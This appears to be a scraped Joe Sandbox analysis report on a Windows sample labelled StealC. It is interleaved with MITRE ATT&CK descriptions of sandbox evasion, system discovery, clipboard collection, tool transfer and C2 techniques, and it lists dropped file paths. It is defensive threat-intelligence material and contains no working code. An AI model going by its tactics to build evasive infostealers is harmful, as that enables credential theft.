Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report LXS5itpTK7.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Protection of GUI

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_B5F8.tmp.exe_63153db8d6331de160a6e57152d3dfaa832bd33f_500334a2_8f490bfc-1dd6-4732-a78b-9b7cf4dd05f9\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9783.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER987E.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER989F.tmp.xml

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ScreenUpdateSync[1].exe

C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

Windows Analysis Report
LXS5itpTK7.exe

Function 004016DF Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 150
clipboardsleepmemoryCOMMON

Function 004029F4 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 134
networkfilesynchronizationCOMMON

Function 0043D03C Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Function 00432F29 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Function 0213003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Function 00402C04 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 180
networkCOMMON

Function 004051D0 Relevance: 9.1, APIs: 6, Instructions: 82
COMMON

Function 00405800 Relevance: 6.0, APIs: 4, Instructions: 29
COMMON

Function 0042DFC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38
threadCOMMON

Function 0042E114 Relevance: 4.6, APIs: 3, Instructions: 54
threadCOMMONLIBRARYCODE

Function 00434755 Relevance: 4.6, APIs: 3, Instructions: 50
COMMONLIBRARYCODE

Function 00402BAD Relevance: 4.5, APIs: 3, Instructions: 41
registryCOMMON

Function 0042E074 Relevance: 4.5, APIs: 3, Instructions: 31
threadCOMMON

Function 0040239E Relevance: 3.1, APIs: 2, Instructions: 125
windowCOMMON

Function 0040155A Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101
sleepCOMMON

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre